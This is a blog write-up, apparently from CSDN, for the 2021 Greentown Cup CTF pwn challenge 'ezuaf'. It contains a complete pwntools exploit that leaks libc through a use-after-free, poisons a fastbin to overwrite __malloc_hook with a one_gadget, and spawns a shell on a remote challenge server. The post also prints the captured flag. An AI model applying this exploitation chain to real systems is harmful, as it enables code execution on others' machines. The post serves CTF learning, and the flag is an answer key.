2021年“绿城杯”网络安全大赛-PWN-ezuaf

最新推荐文章于 2024-06-28 18:24:40 发布
最新推荐文章于 2024-06-28 18:24:40 发布
阅读量316 收藏
点赞数
分类专栏: 2021年“绿城杯”网络安全大赛 文章标签: 网络安全 2021年“绿城杯” PWN unctf python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43264813/article/details/120559662
版权

2021年“绿城杯”网络安全大赛-PWN-ezuaf

题目名称:ezuaf
题目内容:简单的uaf
题目分值:100.0
题目难度:容易
相关附件:ezuaf的附件24.txt

解题思路:

1.检查保护

在这里插入图片描述

2.函数分析

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
发现Delete中有uaf

3.思路

打malloc_hook
exp

from pwn import *

#io = process('./uaf_pwn')
io = remote('82.157.5.28',52402)
elf = ELF('./uaf_pwn')
libc = ELF('/home/wenwenyuyu/Desktop/glibc/libs/2.23-0ubuntu11.3_amd64/libc.so.6')

one_gadget = [0x45226, 0x4527a, 0xf03a4, 0xf1247]

def add(size):
	io.recvuntil('>')
	io.sendline('1')
	io.sendlineafter('size>', str(size))

def delete(index):
	io.recvuntil('>')
	io.sendline('2')
	io.sendlineafter('index>', str(index))

def edit(index, content):
	io.recvuntil('>')
	io.sendline('3')
	io.sendlineafter('index>', str(index))
	io.sendlineafter('content>', content)

def show(index):
	io.recvuntil('>')
	io.sendline('4')
	io.sendlineafter('index>', str(index))

heap = int(io.recv(14), 16)
log.info('heap = ' + hex(heap))
add(0x80)
add(0x60)#1
add(0x10)#2
delete(0)
show(0)

data = u64(io.recv(6).ljust(8, b'\x00'))
log.info('data = ' + hex(data))
libc_base = data - 0x3c4b78
malloc_hook = libc_base + libc.sym['__malloc_hook']
realloc = libc_base + libc.sym['__libc_realloc']
system = libc_base + libc.sym['system']
one = one_gadget[1] + libc_base
log.info('one = ' + hex(one))
delete(1)
edit(1, p64(malloc_hook - 0x23))
add(0x60)#3
add(0x60)#4
payload = b'a'*11 + p64(one) + p64(realloc + 4)
'''
edit(3, '/bin/sh\x00')
edit(4, p64(system))

delete(3)
'''
edit(4,payload)
add(0x10)
io.interactive()

#gdb.attach(io)

DASCTF{d4a7f835c774ce058d8a327bd2a5ed14}

夜白君
关注
专栏目录
pwn2021 绿城(部分)
woodwhale的博客
10-04 3552
pwn2021 绿城(部分) 前言 补题,这场没报名,比赛的时候机房唯一报名的战队pwn穿了(tql),就没去做了 1、uaf_pwn 简单的uaf,free之后之后没有置0,直接申请unsorted bin泄露libc,再double free改malloc_hook写入one_gadget exp如下 def add(size): sla(">","1") sla("size>",str(size)) def free(index): sla("&gt
2021-鹏城实验室网络安全技能大赛-pwn-babyheap 题解
lifanxin的博客
09-28 2456
Write Up文件信息漏洞定位利用分析WP总结 文件信息   本题来自于2021的鹏程比赛的pwn题,题目链接如下:2021-鹏程-pwn-babyheap。   该题目主要考查了libc-2.29.so及以上版本的off-by-null利用方式,本题目使用的是libc-2.31.so,知识点学习推荐博客glibc2.29下的off-by-null。同时作为堆题,保护全开,没有可用的show功能函数,必须使用IO_FILE来leak libc,知识点学习推荐博客pwn题堆利用的一些姿势 – IO_F
2021绿城网络安全大赛
09-30
2021绿城网络安全大赛
[XYCTF新生赛]-PWN:EZ1.0?(mips,mips的shellcode利用)
最新发布
2301_79326813的博客
06-28 404
查看保护查看ida这里用的是retdec,没安装的可以看这个这里直接看反汇编貌似看不出什么,所以直接从汇编找。
2021绿城网络安全大赛-PWN-GreentownNote
qq_43264813的博客
09-30 481
2021绿城网络安全大赛-PWN-GreentownNote 题目名称:GreentownNote 题目内容:欢迎参加绿城~ 题目分值:200.0 题目难度:中等 相关附件:GreentownNote的附件3.txt 解题思路: 1.检查保护 保护全开 2.函数分析 题目只给了add,show,delete add() show() delete() 3.思路 (1)首先free泄露libc (2)构造heap srop 照题目环境2.27,应该是攻击free_hook,把它的值改成set_
2021 绿城 wp
qq_45603443的博客
10-13 1177
2021 绿城 wpWebezcmsezphpMisc[warmup]⾳频隐写ReeasyreCryptoRSA1[warmup]加密算法Pwnnull_pwnuafGreentownNoteTip Web ezcms ciscn华东北分区赛awd的链⼦ <?php namespace think\cache\driver { class File { protected $options=null; protected $tag; function __construct(){ $th
2021绿城网络安全大赛-PWN-null
qq_43264813的博客
09-30 298
2021绿城网络安全大赛-PWN-null 题目名称:null 题目内容:off by… 题目分值:100.0 题目难度:容易 相关附件:null的附件13.txt 解题思路: 1.检查保护 2.函数分析 题目给了四个重要函数,add,delete,edit,show add() delete() edit() show() 3.思路 发现有off by one漏洞,那我们利用off bye one + size错位 exp from pwn import * binary = "./nu
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举,支持功能和开发模块,同时将所有这些都打包在命令行界面中,并且易于使用和可扩展的类贝壳环境。 作者 功能支持 Credential ...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及二进制安全和pwn技术的竞赛题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安全问题。我们将围绕这个主题...
2021绿城pwn部分wp
eeeeeight的博客
09-29 1180
前言: 这次比赛了解到了还有jspwn这玩意, 然后没时间学(, 十月一定(逃) uafpwn: 释放之后指针未置零, 所以use after free乱打 from pwn import * context(log_level = 'debug', arch = 'amd64') # sh = process('./uaf_pwn') sh = remote('82.157.5.28', 52102) elf = ELF('./uaf_pwn') libc = elf.libc def add(siz
[BUUCTF-pwn] 鹏城_2018_easycalc
weixin_52640415的博客
02-09 321
保护基本全开,在add时有个off_by_null漏洞。fd位置只能修改。 unsigned __int64 m1add() { unsigned int v0; // ebx unsigned int v2; // [rsp+4h] [rbp-2Ch] BYREF size_t size; // [rsp+8h] [rbp-28h] BYREF __int64 v4; // [rsp+10h] [rbp-20h] BYREF unsigned __int64 v5; // [rsp
[BUUCTF-pwn] 鹏城_2018_overint
weixin_52640415的博客
02-08 883
老大的帽儿。题目分3部分,第1部分要求输入4个字节这4个字节经过运算得35 __int64 __fastcall sub_4007D1(__int64 a1, int a2) { int v3; // [rsp+18h] [rbp-8h] int i; // [rsp+1Ch] [rbp-4h] v3 = 0; for ( i = 1; i < a2; ++i ) { printf("v[i] is %d\n", (unsigned int)*(char *)(i +
ez_uaf复现
xiaolei0413的博客
04-18 866
之前在学习堆的时候中途懈怠了,导致进度止步不前一直未能理解堆题如何操作,俩个星期前重新开始学习堆的知识,在看完各种视频和博客后有了这一次的uaf题复现。
PWN · heap | UAF】[HNCTF 2022 WEEK4]ez_uaf
Mr_Fmnwon的博客
03-02 766
UAF释放后重用,常见于free指针后指针未置Nullptr。这就导致了原本的功能块还可以使用,而新分配的功能块又附加了额外的功能。利用就在此产生。强烈建议手动画图!以至于第一次在大致写完遇到bug后,甚至仅通过画图审计代码来修改逻辑上的问题,成功实现利用!这说明利用思路是如此清晰。
BUUCTF-pwn-hitcontraining_uaf(UAF)
半岛铁盒的博客
06-05 341
这道题可以用来当做堆的入门题来做 开了NX 这是堆的菜单;
[Dest0g3 pwn] ez_pwn,ea_aarch,dest_love,ezuaf
weixin_52640415的博客
05-27 786
这回的pwn都用的高版本libc,各网站上一般都是2.23,2.27以前几的题,高版本的很少,所以练了半天还不大会,只作了4个简单点的。另外两个已经弄到任意写了,但没找着往哪写管用放弃了。 ez_pwn 题目用到了abs,和scanf两个觉绕过,可以增加数据然后返回和,内存里本身是有残留的,在只输入减号(-)时scanf不修改返回内容,也就会把残留内容输出。导致泄露。另外abs对-1的处理会异至还是负1,可以绕过检查写越界。 int hackme() { int v1[10]; // [esp
2021绿城网络安全大赛-Reverse-[warmup]easy_re
qq_43264813的博客
09-30 1073
2021绿城网络安全大赛-Reverse-[warmup]easy_re 题目名称:[warmup]easy_re 题目内容:热身题,逆向 题目分值:100.0 题目难度:容易 相关附件:[warmup]easy_re的附件.zip 解题思路: main函数看到最后发现关键比较 分析得知v21是输入,v16是大数数组 这里ida将v16后面的值分成了别的变量,实际上也在v16之中 前两个循环用python模拟得到了v24的值 v16=[ 0xF5, 0x8C, 0x8D, 0xE4, 0x9F, 0
长城2021 pwn
清霂的博客
09-20 828
长城20211.K1ng_in_h3Ap_I2.K1ng_in_h3Ap_II 菜鸡第一次在国内比赛做出两道题,害,长城比第五空间温柔多了,第五空间一道rop,之后就直接vm,musl都没学过,还有个c++逆向8出来。打完国赛(写了一道简单堆题,orw调一晚上没出来,服了)之后划水时间太长了,8月下旬才开始继续学堆,争取10月底前把vm,musl,mips,arm这种其他架构(不知道算不算)的pwn学习一下。 1.K1ng_in_h3Ap_I 题目给了3个字节libc地址,操作性还是挺强的,借用残留指针
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜白君

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值